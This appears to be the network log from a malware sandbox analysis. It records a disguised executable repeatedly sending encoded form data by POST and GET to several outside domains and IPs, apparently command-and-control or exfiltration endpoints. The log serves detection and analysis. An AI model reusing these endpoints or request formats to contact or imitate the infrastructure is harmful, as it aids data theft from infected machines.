                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Ascii: 9PZt=NStUcy3QdCnATr7YdbjyySjAgyxamkvQdWxD+VwoPLTcuglP0zW82tFsj+0JMnzRVLCb8mPCLHiSzfGavbodiVeylQ/9A/P9R12V8IwayCSn49jPaO06LOySDIrYhkwF7rTxOcOyeCgbk/B1w8zk5GZD15qtGL9uBM6XASKgd9XJhM+Idcs6ATGngnFjbb9x6GhlNTELNevO
Jan 11, 2025 04:26:34.955912113 CET | 190 | IN | HTTP/1.1 400 Bad Request
                                                                                                            Server: nginx
                                                                                                            Date: Sat, 11 Jan 2025 03:31:02 GMT
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                            Data Ascii: d404 Not Found0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.6 | 50010 | 154.208.202.225 | 80 | 1436 | C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:26:36.601918936 CET | 768 | OUT | POST /k6vm/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.zoomlive.live
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 233
                                                                                                            Connection: close
                                                                                                            Origin: http://www.zoomlive.live
                                                                                                            Referer: http://www.zoomlive.live/k6vm/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Ascii: 9PZt=NStUcy3QdCnASIjYQc/ynCjH8ixa90uZdW9D+Ro4P//cuC9P6SW81tFsoe0MRXzeVLPu8jPCLHmSza6assEejFewtw/7E/P9R12V8JU0yCan4P3Pats5U+yTKorY2UwB7rTDOdiUeAIbk9Z1zpHjwGZB7ZroIeEeHsTPICi4K/jvk6jSBvsZSDmlgldRb79b4GZlfEIsCqKtBR5SLYcOt7vTdBeTvmAoHQ==
Jan 11, 2025 04:26:37.526745081 CET | 190 | IN | HTTP/1.1 400 Bad Request
                                                                                                            Server: nginx
                                                                                                            Date: Sat, 11 Jan 2025 03:31:05 GMT
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                            Data Ascii: d404 Not Found0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.6 | 50011 | 154.208.202.225 | 80 | 1436 | C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:26:39.142880917 CET | 1781 | OUT | POST /k6vm/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.zoomlive.live
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 1245
                                                                                                            Connection: close
                                                                                                            Origin: http://www.zoomlive.live
                                                                                                            Referer: http://www.zoomlive.live/k6vm/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
Jan 11, 2025 04:26:40.085506916 CET | 190 | IN | HTTP/1.1 400 Bad Request
                                                                                                            Server: nginx
                                                                                                            Date: Sat, 11 Jan 2025 03:31:08 GMT
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                            Data Ascii: d404 Not Found0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.6 | 50012 | 154.208.202.225 | 80 | 1436 | C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 04:26:41.683470964 CET | 485 | OUT | GET /k6vm/?I8A=fF8h_X3X0TB&9PZt=AQF0fE/xUBvXcoq8VPDc3VbpsTF0nlDqSFZLjGUQNoLeoSEU8z/8yZQb5sAEaF7nLYLL9iygL0eptKGi7pEnvFfogATAKvfKf2eq3ZcSrhy/qdqLc/JYZ8TgWJuF+1kS7eDlOqY= HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.zoomlive.live
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
Jan 11, 2025 04:26:43.085395098 CET | 180 | IN | HTTP/1.1 503 Service Unavailable
                                                                                                            Server: nginx
                                                                                                            Date: Sat, 11 Jan 2025 03:31:11 GMT
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            21 | 192.168.2.6 | 50014 | 77.68.64.45 | 80 | 1436 | C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Jan 11, 2025 04:26:48.166335106 CET | 756 | OUT | POST /725g/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.dietcoffee.online
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 209
                                                                                                            Connection: close
                                                                                                            Origin: http://www.dietcoffee.online
                                                                                                            Referer: http://www.dietcoffee.online/725g/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Ascii: 9PZt=jgo+nmRTntVNHPAqzKLhCXPBYugCVbFBBhle2vKc8wEWf5bPava4qyAMWoeusxJozkexmylkIOCYP210mVXAm0Iyn9ytq04Ul3bl/70+uyOK2YNzJ1FEmw6w2R1yhM1bYThGo1RxWqZhN7VAuWFqtkYLylhfXrASZhZL5Ikk0ZPeKt35AdlWuGSadZVjkJX8MGixwrxzCKoK
                                                                                                            Jan 11, 2025 04:26:48.756928921 CET | 393 | IN | HTTP/1.1 404 Not Found
                                                                                                            Server: nginx/1.25.3
                                                                                                            Date: Sat, 11 Jan 2025 03:26:49 GMT
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Content-Encoding: gzip


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            22 | 192.168.2.6 | 50015 | 77.68.64.45 | 80 | 1436 | C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Jan 11, 2025 04:26:50.723418951 CET | 780 | OUT | POST /725g/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.dietcoffee.online
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 233
                                                                                                            Connection: close
                                                                                                            Origin: http://www.dietcoffee.online
                                                                                                            Referer: http://www.dietcoffee.online/725g/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Ascii: 9PZt=jgo+nmRTntVNV/wq2ojhE3PCXOgCb7FFBhpe2uO29FcWR8nPbua4pyAMeIehiRIkzkCDmzpkIOGYP3F0mkXBmkI0rdyvlU4Ul3bl/7wEuyWK2o9zIUFHvQ63xR1yqs1XYTgjowxfWsdhN7lA3nFtnkYF/Fg2b6pgTgYh1r0ci5v1Pbqjcul18WyYdbNRkpXWOGaxi89UN+NptIU/CVYQmlxB/QeXQZd9aw==
                                                                                                            Jan 11, 2025 04:26:51.299280882 CET | 393 | IN | HTTP/1.1 404 Not Found
                                                                                                            Server: nginx/1.25.3
                                                                                                            Date: Sat, 11 Jan 2025 03:26:52 GMT
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Content-Encoding: gzip


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            23 | 192.168.2.6 | 50016 | 77.68.64.45 | 80 | 1436 | C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Jan 11, 2025 04:26:53.271564007 CET | 1793 | OUT | POST /725g/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.dietcoffee.online
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 1245
                                                                                                            Connection: close
                                                                                                            Origin: http://www.dietcoffee.online
                                                                                                            Referer: http://www.dietcoffee.online/725g/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Jan 11, 2025 04:26:53.846975088 CET | 393 | IN | HTTP/1.1 404 Not Found
                                                                                                            Server: nginx/1.25.3
                                                                                                            Date: Sat, 11 Jan 2025 03:26:54 GMT
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Content-Encoding: gzip


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            24 | 192.168.2.6 | 50017 | 77.68.64.45 | 80 | 1436 | C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Jan 11, 2025 04:26:55.811008930 CET | 489 | OUT | GET /725g/?9PZt=uiAekWsFoddhMu9w6av3IR3qRfkxEYhiHCdKsu6SwDAva+OcXfn0u3hNB8zZhz0kzkOslwZXAdf6Zktj+FCGjzQZh9bjjklx+lq67asD3Aqsp6I0O3QatHKxujksh8AYT18lk1s=&I8A=fF8h_X3X0TB HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.dietcoffee.online
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Jan 11, 2025 04:26:56.407304049 CET | 373 | IN | HTTP/1.1 404 Not Found
                                                                                                            Server: nginx/1.25.3
                                                                                                            Date: Sat, 11 Jan 2025 03:26:57 GMT
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Content-Length: 203
                                                                                                            Connection: close
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /725g/ was not found on this server.</p></body></html>


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            25 | 192.168.2.6 | 50018 | 208.91.197.27 | 80 | 1436 | C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Jan 11, 2025 04:27:01.692235947 CET | 753 | OUT | POST /v2ut/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.guacamask.online
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 209
                                                                                                            Connection: close
                                                                                                            Origin: http://www.guacamask.online
                                                                                                            Referer: http://www.guacamask.online/v2ut/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Ascii: 9PZt=cwNQIXCQp2K9slZZvxa/1CsIb+Br0+NV7gwdtqO/BJWYHKIN0bGVwb6bb4+bu4FU+ZPzoL9z4pJjKqu5v1FrAUl5isyCKX8PuAH199SUINrAB79aPEVSCxobyRL287N7LzxA+nB6HPSzM/dViMwO13VJRqQN/BAq+tio+aWtBlWanN94xdUY0y/RdcT8LymuZG7j7CxoRBEy


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            26 | 192.168.2.6 | 50019 | 208.91.197.27 | 80 | 1436 | C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Jan 11, 2025 04:27:04.236709118 CET | 777 | OUT | POST /v2ut/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.guacamask.online
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 233
                                                                                                            Connection: close
                                                                                                            Origin: http://www.guacamask.online
                                                                                                            Referer: http://www.guacamask.online/v2ut/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Ascii: 9PZt=cwNQIXCQp2K9uGRZpSy/+CsLHOBr9eMc7gMdtojkA96YJIAN3aGVjr6bQY+aq4Fb+ZCMoOdz4pdjKoG5vEF0AElBvMyMJn8PuAH1957JIMPABOtaNlVRBxoclhL247N/Lzxi+iZUHN6zM+tVlfoNiHVLcKRkyDgkyd7f6ITIRkC9m7gituU7mifTdeLOLSmEbGDjpV9Pe1hR0L29rYaX3DABTgW4b8v37Q==


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            27 | 192.168.2.6 | 50020 | 208.91.197.27 | 80 | 1436 | C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Jan 11, 2025 04:27:06.783391953 CET | 1790 | OUT | POST /v2ut/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.guacamask.online
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 1245
                                                                                                            Connection: close
                                                                                                            Origin: http://www.guacamask.online
                                                                                                            Referer: http://www.guacamask.online/v2ut/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            28 | 192.168.2.6 | 50021 | 208.91.197.27 | 80 | 1436 | C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Jan 11, 2025 04:27:09.325422049 CET | 488 | OUT | GET /v2ut/?I8A=fF8h_X3X0TB&9PZt=RylwLg2ZpVS2rFdSlQee5TIAL9VVjaBtzTw+4qXkIOieMIxPna2x473GB7GRuoZi44HZ9KZH1KJCd6HB3lVLIzhxo/qMOX8MgFiq9bThHJniXb4lO04jER0alxiz9odaEmB/xSI= HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.guacamask.online
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Jan 11, 2025 04:27:10.240576029 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 03:27:09 GMT
                                                                                                            Server: Apache
                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                            Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                            Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                            Set-Cookie: vsid=903vr484111629531572869; expires=Thu, 10-Jan-2030 03:27:09 GMT; Max-Age=157680000; path=/; domain=www.guacamask.online; HttpOnly
                                                                                                            X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_m3BWUuV8QqfjGPwOoEbl3hQiv91G4Tl1zMgkIWlYF4TVlVG9dHogQXer4apmNj+0sEMxsTZL/GxK5o/QjUDiOw==
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Connection: close
                                                                                                            Data Ascii: 7bfb<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            29 | 192.168.2.6 | 50022 | 84.32.84.32 | 80 | 1436 | C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Jan 11, 2025 04:27:15.567838907 CET | 750 | OUT | POST /qt4m/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.appsolucao.shop
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 209
                                                                                                            Connection: close
                                                                                                            Origin: http://www.appsolucao.shop
                                                                                                            Referer: http://www.appsolucao.shop/qt4m/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Ascii: 9PZt=yb4QGOcDnWALXGgoxg/B7TndmMkoJZhDjh1cgRLkenr3cJ6HjlHnv9aSniltYRKAxZoWGeeJr8K3n/kHAJlUASet5m1jFNpo9nqNIj+sU9rcuEJWHcmLTDaDpV4WZgn5hrcM/To9AZ/OYvRWL0OnVXsgi3qsiOPlUhDRcTYaZCDbEmSC5l2A+t0eaPtgluWBYXd8DM3L3QqP


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            30 | 192.168.2.6 | 50023 | 84.32.84.32 | 80 | 1436 | C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Jan 11, 2025 04:27:18.111947060 CET | 774 | OUT | POST /qt4m/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.appsolucao.shop
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 233
                                                                                                            Connection: close
                                                                                                            Origin: http://www.appsolucao.shop
                                                                                                            Referer: http://www.appsolucao.shop/qt4m/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Ascii: 9PZt=yb4QGOcDnWALXnQoiTXB5znc48koQJhPjhJcgV6jeRT3bseHig7ns9aSvClkXxLMxZljGb+Jr823n+0Hcq9Laiev/m1hY9po9nqNIj6VU5Hcv3RWG+eIQDaAqV4Wdgmwhrci/WIXAaHOYtZWLmmgCHsqvXrApN6xTCKoSVYmaQnEBQPYlW2js9UcaN1SlOWraXl8Rb7s4kPsWC6H+ORrPQUZsHrVh3WzjA==


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            31 | 192.168.2.6 | 50024 | 84.32.84.32 | 80 | 1436 | C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Jan 11, 2025 04:27:20.658957005 CET | 1787 | OUT | POST /qt4m/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.appsolucao.shop
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 1245
                                                                                                            Connection: close
                                                                                                            Origin: http://www.appsolucao.shop
                                                                                                            Referer: http://www.appsolucao.shop/qt4m/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            32 | 192.168.2.6 | 50025 | 84.32.84.32 | 80 | 1436 | C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Jan 11, 2025 04:27:23.198107958 CET | 487 | OUT | GET /qt4m/?9PZt=/ZQwF7Ip71YCaUlU/jTQ7l2Lp/ZTQN44rx1LzCy9bB7kVb+FnyrErN7h2wh6V0uCxKMxAv7qgoDPyMkbBqZLKSqD3jYvFd9V+3GHQAeGdc6B9Gg3Jsv2Vj+r5nwJfwG+iPE84zU=&I8A=fF8h_X3X0TB HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.appsolucao.shop
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Jan 11, 2025 04:27:23.657279968 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 03:27:23 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 9973
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Server: hcdn
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            x-hcdn-request-id: 38368160d7971a8c804011f2240c2ae4-bos-edge2
                                                                                                            Expires: Sat, 11 Jan 2025 03:27:22 GMT
                                                                                                            Cache-Control: no-cache
                                                                                                            Accept-Ranges: bytes
                                                                                                            Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                                                                            Jan 11, 2025 04:27:23.658144951 CET1236INData Raw: 28 63 3d 65 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 2d 22 29 29 3c 30 26 26 28 63 3d 30 29 2c 75 3d 30 3b 75 3c 63 3b 2b 2b 75 29 7b 69 66 28 74 26 26 28 79 5b 6d 2e 6c 65 6e 67 74 68 5d 3d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 75 29 2d 36 35
                                                                                                            Data Ascii: (c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c;++u){if(t&&(y[m.length]=e.charCodeAt(u)-65<26),128<=e.charCodeAt(u))throw new RangeError("Illegal input >= 0x80");m.push(e.charCodeAt(u))}for(d=0<c?c+1:0;d<E;){for(l=f,p=1,g=o;;g+=o){if(E<=d)throw RangeE
                                                                                                            Jan 11, 2025 04:27:23.658150911 CET884INData Raw: 2b 2b 64 29 68 3c 3d 28 43 3d 74 5b 64 5d 29 26 26 43 3c 6c 26 26 28 6c 3d 43 29 3b 69 66 28 6c 2d 68 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 28 69 2b 31 29 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63
